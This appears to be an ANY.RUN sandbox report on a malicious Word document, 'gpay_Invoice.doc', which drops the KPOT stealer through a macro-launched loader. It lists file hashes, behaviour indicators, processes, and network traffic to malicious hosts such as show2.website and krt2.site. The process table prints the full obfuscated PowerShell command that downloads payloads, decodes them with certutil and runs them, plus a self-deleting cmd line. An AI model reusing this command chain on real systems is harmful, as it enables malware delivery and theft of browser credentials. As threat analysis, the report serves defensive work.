analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

gpay_Invoice.doc

Full analysis: https://app.any.run/tasks/973b4f49-f392-46ca-8397-16be6e52678c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: March 30, 2020, 15:20:02
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
macros
macros-on-open
autoit
loader
trojan
opendir
stealer
kpot
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: user, Template: Normal, Last Saved By: User, Revision Number: 17, Name of Creating Application: Microsoft Office Word, Total Editing Time: 16:00, Create Time/Date: Mon Mar 23 21:08:00 2020, Last Saved Time/Date: Mon Mar 30 15:05:00 2020, Number of Pages: 1, Number of Words: 91, Number of Characters: 519, Security: 0
MD5:

4A401D041E4208772C05DECCF0B614BB

SHA1:

03F669BF1BB6E40F5677F6A65C6F7583CC0F3FCF

SHA256:

734A56F1E63DCEA04A5454D009AF25002B3FE58BB493EEB3CE7F77112B6B9776

SSDEEP:

3072:jeijcTqxcqr3fYp0koMP21RCERChq+hr0vvvvyGPPPPPjZsWcc8qsFimBx+knro2:J8qsFiMx+kroLU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • tkold.com (PID: 6060)
      • tkold.com (PID: 5668)
    • KPOT was detected

      • svchost.exe (PID: 2380)
    • Uses SVCHOST.EXE for hidden code execution

      • tkold.com (PID: 5668)
    • Connects to CnC server

      • svchost.exe (PID: 2380)
  • SUSPICIOUS

    • PowerShell script executed

      • powershell.exe (PID: 4728)
    • Executed via WMI

      • powershell.exe (PID: 4728)
    • Starts CertUtil for decode files

      • powershell.exe (PID: 4728)
    • Application launched itself

      • tkold.com (PID: 6060)
    • Starts application with an unusual extension

      • powershell.exe (PID: 4728)
      • tkold.com (PID: 6060)
    • Reads the cookies of Google Chrome

      • svchost.exe (PID: 2380)
    • Starts CMD.EXE for self-deleting

      • svchost.exe (PID: 2380)
    • Starts CMD.EXE for commands execution

      • svchost.exe (PID: 2380)
    • Searches for installed software

      • svchost.exe (PID: 2380)
    • Executed via COM

      • ApplicationFrameHost.exe (PID: 904)
      • SystemSettings.exe (PID: 5796)
      • RuntimeBroker.exe (PID: 548)
      • backgroundTaskHost.exe (PID: 3612)
      • SpeechRuntime.exe (PID: 5928)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 4728)
      • backgroundTaskHost.exe (PID: 3612)
      • SpeechRuntime.exe (PID: 5928)
    • Checks supported languages

      • backgroundTaskHost.exe (PID: 3612)
      • SystemSettings.exe (PID: 5796)
    • Creates files in the user directory

      • SystemSettings.exe (PID: 5796)
  • INFO

    • Reads Environment values

      • WINWORD.EXE (PID: 1668)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1668)
    • Scans artifacts that could help determine the target

      • WINWORD.EXE (PID: 1668)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 1668)
    • Reads the software policy settings

      • WINWORD.EXE (PID: 1668)
      • powershell.exe (PID: 4728)
    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 1668)
      • powershell.exe (PID: 4728)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1668)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: -
Subject: -
Author: user
Keywords: -
Comments: -
Template: Normal
LastModifiedBy: User
RevisionNumber: 17
Software: Microsoft Office Word
TotalEditTime: 16.0 minutes
CreateDate: 2020:03:23 21:08:00
ModifyDate: 2020:03:30 14:05:00
Pages: 1
Words: 91
Characters: 519
Security: None
CodePage: Unicode (UTF-8)
Company: diakov.net
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 609
AppVersion: 15
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Название
  • 1
CompObjUserTypeLen: -
CompObjUserType: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
107
Monitored processes
16
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
start winword.exe powershell.exe no specs conhost.exe certutil.exe no specs tkold.com no specs tkold.com no specs svchost.exe no specs #KPOT svchost.exe cmd.exe no specs conhost.exe ping.exe no specs applicationframehost.exe no specs systemsettings.exe no specs runtimebroker.exe no specs backgroundtaskhost.exe no specs speechruntime.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1668"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\gpay_Invoice.doc" /o ""C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
16.0.12026.20264
4728powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
5676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
4048"C:\WINDOWS\system32\certutil.exe" -decode xtd42 y29x3C:\WINDOWS\system32\certutil.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
6060"C:\Users\admin\AppData\Local\Temp\tkold.com" y29x3 C:\Users\admin\AppData\Local\Temp\tkold.compowershell.exe
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 5
5668C:\Users\admin\AppData\Local\Temp\tkold.com y29x3 C:\Users\admin\AppData\Local\Temp\tkold.comtkold.com
User:
admin
Company:
AutoIt Team
Integrity Level:
MEDIUM
Description:
AutoIt v3 Script
Exit code:
0
Version:
3, 3, 14, 5
5216"C:\WINDOWS\SysWOW64\svchost.exe"C:\WINDOWS\SysWOW64\svchost.exetkold.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2380"C:\WINDOWS\SysWOW64\svchost.exe"C:\WINDOWS\SysWOW64\svchost.exe
tkold.com
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Host Process for Windows Services
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
1848"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\WINDOWS\SysWOW64\svchost.exe"C:\WINDOWS\SysWOW64\cmd.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2076\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
Total events
5 080
Read events
4 665
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
11
Unknown types
5

Dropped files

PID
Process
Filename
Type
1668WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\54JGLQU4YJ0LLC60T7TY.temp
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\12SNPBWM6WGBF4NII61T.temp
MD5:
SHA256:
4728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5xh0epyo.tft.ps1
MD5:
SHA256:
4728powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mwspmngh.cu5.psm1
MD5:
SHA256:
5796SystemSettings.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XQY8PSPU0WSQ4LXDQV6G.temp
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DF188D00D4598B8D1A.TMP
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{259EFF63-4803-4F46-9C5F-993573D847B5}.tmp
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D41E77F0-119D-40A2-842C-BBE39602F907}.tmp
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-shm
MD5:
SHA256:
1668WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\winword.exe.db-wal
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
15
TCP/UDP connections
8
DNS requests
9
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5664
svchost.exe
HEAD
200
93.126.60.42:80
http://show2.website/geZjS.dat
IR
malicious
5664
svchost.exe
HEAD
200
93.126.60.42:80
http://show2.website/acPMQ.dat
IR
malicious
5664
svchost.exe
HEAD
200
93.126.60.42:80
http://show2.website/nMbd.dat
IR
malicious
5664
svchost.exe
GET
200
93.126.60.42:80
http://show2.website/acPMQ.dat
IR
binary
91.5 Kb
malicious
2380
svchost.exe
GET
122.122.122.122:80
http://krt2.site/
TW
malicious
1668
WINWORD.EXE
GET
200
13.107.3.128:443
https://config.edge.skype.com/config/v2/Office/word/16.0.12026.20264/Production/CC?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=word&Platform=win32&Version=16.0.12026.20264&MsoVersion=16.0.12026.20194&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7bB20437FE-12DE-4A71-8FAC-FA70BE29C0C5%7d&LabMachine=false
US
text
84.8 Kb
whitelisted
2380
svchost.exe
GET
122.122.122.122:80
http://krt2.site/
TW
malicious
2380
svchost.exe
GET
304
20.191.48.196:443
https://settings-win-ppe.data.microsoft.com/settings/v2.0/Storage/StorageHealthEvaluation?os=Windows&deviceClass=Windows.Desktop&appVer=1.0.0.0
US
whitelisted
5664
svchost.exe
GET
200
93.126.60.42:80
http://show2.website/nMbd.dat
IR
text
263 Kb
malicious
5664
svchost.exe
GET
200
93.126.60.42:80
http://show2.website/geZjS.dat
IR
executable
872 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5664
svchost.exe
93.126.60.42:80
show2.website
Asmanfaraz Sepahan Isdp (pjs)
IR
malicious
1668
WINWORD.EXE
52.114.128.75:443
self.events.data.microsoft.com
Microsoft Corporation
US
unknown
1668
WINWORD.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
2380
svchost.exe
122.122.122.122:80
krt2.site
Data Communication Business Group
TW
suspicious
2380
svchost.exe
93.126.60.42:80
show2.website
Asmanfaraz Sepahan Isdp (pjs)
IR
malicious
5420
svchost.exe
20.191.48.196:443
settings-win-ppe.data.microsoft.com
Microsoft Corporation
US
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
self.events.data.microsoft.com
  • 52.114.128.75
  • 52.114.36.4
whitelisted
show2.website
  • 93.126.60.42
malicious
krt1.site
malicious
krt2.site
  • 122.122.122.122
malicious
krt3.site
  • 93.126.60.42
malicious
settings-win-ppe.data.microsoft.com
  • 20.191.48.196
whitelisted

Threats

PID
Process
Class
Message
5664
svchost.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
5664
svchost.exe
Misc activity
ET INFO Certificate with Unknown Content M1
2380
svchost.exe
A Network Trojan was detected
STEALER [PTsecurity] Kpot
2 ETPRO signatures available at the full report
No debug info